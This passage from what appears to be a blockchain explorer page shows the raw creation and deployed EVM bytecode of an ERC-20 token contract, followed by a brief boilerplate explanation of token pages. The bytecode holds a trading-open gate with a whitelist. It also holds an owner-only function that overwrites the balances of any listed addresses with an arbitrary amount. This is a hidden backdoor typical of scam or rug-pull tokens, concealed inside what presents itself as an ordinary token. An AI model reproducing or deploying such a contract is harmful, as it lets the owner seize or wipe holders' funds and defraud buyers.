0025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680610a54575060025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15610bfb57610ac2816040518060600160405280602681526020016116b0602691395f808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610dec9092919063ffffffff16565b5f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550610b51815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610e4090919063ffffffff16565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610bee919061101d565b60405180910390a3610de7565b60075f9054906101000a900460ff16610c49576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4090611631565b60405180910390fd5b610cb2816040518060600160405280602681526020016116b0602691395f808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610dec9092919063ffffffff16565b5f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550610d41815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610e4090919063ffffffff16565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610dde919061101d565b60405180910390a35b505050565b5f838311158290610e33576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2a9190610edf565b60405180910390fd5b5082840390509392505050565b5f8183610e4d919061167c565b905092915050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610e8c578082015181840152602081019050610e71565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610eb182610e55565b610ebb8185610e5f565b9350610ecb818560208601610e6f565b610ed481610e97565b840191505092915050565b5f6020820190508181035f830152610ef78184610ea7565b905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610f3982610f10565b9050919050565b610f4981610f2f565b8114610f53575f80fd5b50565b5f81359050610f6481610f40565b92915050565b5f819050919050565b610f7c81610f6a565b8114610f86575f80fd5b50565b5f81359050610f9781610f73565b92915050565b5f8060408385031215610fb357610fb2610f08565b5b5f610fc085828601610f56565b9250506020610fd185828601610f89565b9150509250929050565b5f8115159050919050565b610fef81610fdb565b82525050565b5f6020820190506110085f830184610fe6565b92915050565b61101781610f6a565b82525050565b5f6020820190506110305f83018461100e565b92915050565b5f805f6060848603121561104d5761104c610f08565b5b5f61105a86828701610f56565b935050602061106b86828701610f56565b925050604061107c86828701610f89565b9150509250925092565b5f60ff82169050919050565b61109b81611086565b82525050565b5f6020820190506110b45f830184611092565b92915050565b5f80fd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b6110f482610e97565b810181811067ffffffffffffffff82111715611113576111126110be565b5b80604052505050565b5f611125610eff565b905061113182826110eb565b919050565b5f67ffffffffffffffff8211156111505761114f6110be565b5b602082029050602081019050919050565b5f80fd5b5f61117761117284611136565b61111c565b9050808382526020820190506020840283018581111561119a57611199611161565b5b835b818110156111c357806111af8882610f56565b84526020840193505060208101905061119c565b5050509392505050565b5f82601f8301126111e1576111e06110ba565b5b81356111f1848260208601611165565b91505092915050565b5f80604083850312156112105761120f610f08565b5b5f83013567ffffffffffffffff81111561122d5761122c610f0c565b5b611239858286016111cd565b925050602061124a85828601610f89565b9150509250929050565b5f6020828403121561126957611268610f08565b5b5f61127684828501610f56565b91505092915050565b5f806040838503121561129557611294610f08565b5b5f6112a285828601610f56565b92505060206112b385828601610f56565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061130157607f821691505b602082108103611314576113136112bd565b5b50919050565b7f4e6f7420616c6c6f7765640000000000000000000000000000000000000000005f82015250565b5f61134e600b83610e5f565b91506113598261131a565b602082019050919050565b5f6020820190508181035f83015261137b81611342565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611409602483610e5f565b9150611414826113af565b604082019050919050565b5f6020820190508181035f830152611436816113fd565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611497602283610e5f565b91506114a28261143d565b604082019050919050565b5f6020820190508181035f8301526114c48161148b565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611525602583610e5f565b9150611530826114cb565b604082019050919050565b5f6020820190508181035f83015261155281611519565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6115b3602383610e5f565b91506115be82611559565b604082019050919050565b5f6020820190508181035f8301526115e0816115a7565b9050919050565b7f54726164696e67206973206e6f74206f70656e656420796574000000000000005f82015250565b5f61161b601983610e5f565b9150611626826115e7565b602082019050919050565b5f6020820190508181035f8301526116488161160f565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61168682610f6a565b915061169183610f6a565b92508282019050808211156116a9576116a861164f565b5b9291505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122050499ed09268fc6ffc7bbf0a82d718b1e0ae8aa8e99ea53e9720237c4e30e74a64736f6c63430008180033

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100a7575f3560e01c80636d8c1d461161006f5780636d8c1d461461016557806370a082311461018157806395d89b41146101b1578063a9059cbb146101cf578063c9567bf9146101ff578063dd62ed3e14610209576100a7565b806306fdde03146100ab578063095ea7b3146100c957806318160ddd146100f957806323b872dd14610117578063313ce56714610147575b5f80fd5b6100b3610239565b6040516100c09190610edf565b60405180910390f35b6100e360048036038101906100de9190610f9d565b6102c9565b6040516100f09190610ff5565b60405180910390f35b6101016102e6565b60405161010e919061101d565b60405180910390f35b610131600480360381019061012c9190611036565b6102ef565b60405161013e9190610ff5565b60405180910390f35b61014f6103c3565b60405161015c91906110a1565b60405180910390f35b61017f600480360381019061017a91906111fa565b6103d8565b005b61019b60048036038101906101969190611254565b6104e5565b6040516101a8919061101d565b60405180910390f35b6101b961052a565b6040516101c69190610edf565b60405180910390f35b6101e960048036038101906101e49190610f9d565b6105ba565b6040516101f69190610ff5565b60405180910390f35b6102076105d7565b005b610223600480360381019061021e919061127f565b610691565b604051610230919061101d565b60405180910390f35b606060038054610248906112ea565b80601f0160208091040260200160405190810160405280929190818152602001828054610274906112ea565b80156102bf5780601f10610296576101008083540402835291602001916102bf565b820191905f5260205f20905b8154815290600101906020018083116102a257829003601f168201915b5050505050905090565b5f6102dc6102d5610713565b848461071a565b6001905092915050565b5f600654905090565b5f6102fb8484846108dd565b6103b884610307610713565b6103b3856040518060600160405280602881526020016116d66028913960015f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f61036a610713565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610dec9092919063ffffffff16565b61071a565b600190509392505050565b5f60055f9054906101000a900460ff16905090565b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610468576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161045f90611364565b60405180910390fd5b5f5b82518110156104e0575f83828151811061048757610486611382565b5b60200260200101519050825f808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555050808060010191505061046a565b505050565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b606060048054610539906112ea565b80601f0160208091040260200160405190810160405280929190818152602001828054610565906112ea565b80156105b05780601f10610587576101008083540402835291602001916105b0565b820191905f5260205f20905b81548152906001019060200180831161059357829003601f168201915b5050505050905090565b5f6105cd6105c6610713565b84846108dd565b6001905092915050565b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610667576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161065e90611364565b60405180910390fd5b60075f9054906101000a900460ff161560075f6101000a81548160ff021916908315150217905550565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610788576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161077f9061141f565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107f6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107ed906114ad565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516108d0919061101d565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361094b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109429061153b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109b9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109b0906115c9565b60405180910390fd5b60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680610a54575060025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15610bfb57610ac2816040518060600160405280602681526020016116b0602691395f808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610dec9092919063ffffffff16565b5f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550610b51815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610e4090919063ffffffff16565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610bee919061101d565b60405180910390a3610de7565b60075f9054906101000a900460ff16610c49576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4090611631565b60405180910390fd5b610cb2816040518060600160405280602681526020016116b0602691395f808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610dec9092919063ffffffff16565b5f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550610d41815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610e4090919063ffffffff16565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610dde919061101d565b60405180910390a35b505050565b5f838311158290610e33576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2a9190610edf565b60405180910390fd5b5082840390509392505050565b5f8183610e4d919061167c565b905092915050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610e8c578082015181840152602081019050610e71565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610eb182610e55565b610ebb8185610e5f565b9350610ecb818560208601610e6f565b610ed481610e97565b840191505092915050565b5f6020820190508181035f830152610ef78184610ea7565b905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610f3982610f10565b9050919050565b610f4981610f2f565b8114610f53575f80fd5b50565b5f81359050610f6481610f40565b92915050565b5f819050919050565b610f7c81610f6a565b8114610f86575f80fd5b50565b5f81359050610f9781610f73565b92915050565b5f8060408385031215610fb357610fb2610f08565b5b5f610fc085828601610f56565b9250506020610fd185828601610f89565b9150509250929050565b5f8115159050919050565b610fef81610fdb565b82525050565b5f6020820190506110085f830184610fe6565b92915050565b61101781610f6a565b82525050565b5f6020820190506110305f83018461100e565b92915050565b5f805f6060848603121561104d5761104c610f08565b5b5f61105a86828701610f56565b935050602061106b86828701610f56565b925050604061107c86828701610f89565b9150509250925092565b5f60ff82169050919050565b61109b81611086565b82525050565b5f6020820190506110b45f830184611092565b92915050565b5f80fd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b6110f482610e97565b810181811067ffffffffffffffff82111715611113576111126110be565b5b80604052505050565b5f611125610eff565b905061113182826110eb565b919050565b5f67ffffffffffffffff8211156111505761114f6110be565b5b602082029050602081019050919050565b5f80fd5b5f61117761117284611136565b61111c565b9050808382526020820190506020840283018581111561119a57611199611161565b5b835b818110156111c357806111af8882610f56565b84526020840193505060208101905061119c565b5050509392505050565b5f82601f8301126111e1576111e06110ba565b5b81356111f1848260208601611165565b91505092915050565b5f80604083850312156112105761120f610f08565b5b5f83013567ffffffffffffffff81111561122d5761122c610f0c565b5b611239858286016111cd565b925050602061124a85828601610f89565b9150509250929050565b5f6020828403121561126957611268610f08565b5b5f61127684828501610f56565b91505092915050565b5f806040838503121561129557611294610f08565b5b5f6112a285828601610f56565b92505060206112b385828601610f56565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061130157607f821691505b602082108103611314576113136112bd565b5b50919050565b7f4e6f7420616c6c6f7765640000000000000000000000000000000000000000005f82015250565b5f61134e600b83610e5f565b91506113598261131a565b602082019050919050565b5f6020820190508181035f83015261137b81611342565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611409602483610e5f565b9150611414826113af565b604082019050919050565b5f6020820190508181035f830152611436816113fd565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611497602283610e5f565b91506114a28261143d565b604082019050919050565b5f6020820190508181035f8301526114c48161148b565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611525602583610e5f565b9150611530826114cb565b604082019050919050565b5f6020820190508181035f83015261155281611519565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6115b3602383610e5f565b91506115be82611559565b604082019050919050565b5f6020820190508181035f8301526115e0816115a7565b9050919050565b7f54726164696e67206973206e6f74206f70656e656420796574000000000000005f82015250565b5f61161b601983610e5f565b9150611626826115e7565b602082019050919050565b5f6020820190508181035f8301526116488161160f565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61168682610f6a565b915061169183610f6a565b92508282019050808211156116a9576116a861164f565b5b9291505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122050499ed09268fc6ffc7bbf0a82d718b1e0ae8aa8e99ea53e9720237c4e30e74a64736f6c63430008180033

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.